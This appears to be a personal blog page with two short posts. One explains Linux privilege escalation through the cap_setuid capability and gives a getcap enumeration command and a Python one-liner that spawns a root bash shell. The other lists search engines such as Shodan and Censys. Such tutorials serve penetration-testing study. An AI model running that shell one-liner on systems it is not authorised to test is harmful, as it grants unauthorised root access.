Exploit on slightlymore

How to get a root shell using results from getcap

Mon, 01 Dec 2025 00:00:00 +0000

getcap is a program to get capabilities of others. The one which is a way in is cap_setuid

getcap -r / 2>/dev/null

If anything’s listed which lets you script, you can use that to get a shell. Here’s a Python example:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Useful search engines

Thu, 27 Nov 2025 00:00:00 +0000

Meta search

Kagi ↗️ premium (paid for and ad-free) search prioritising privacy and user experience. Reminiscent of the good-old-days
SearXNG ↗️ self-hostable, open-source metasearch engine that aggregates results from 200+ engines. There are hosted versions but privacy or veracity is not guaranteed

Specialist

Virus Total ↗️ meta engine for checking files and their hashes against virus databases
Shodan ↗️ is an engine to find devices connected to the internet
Censys ↗️ searches hosts, IPs, certificates

Exploits and CVE databases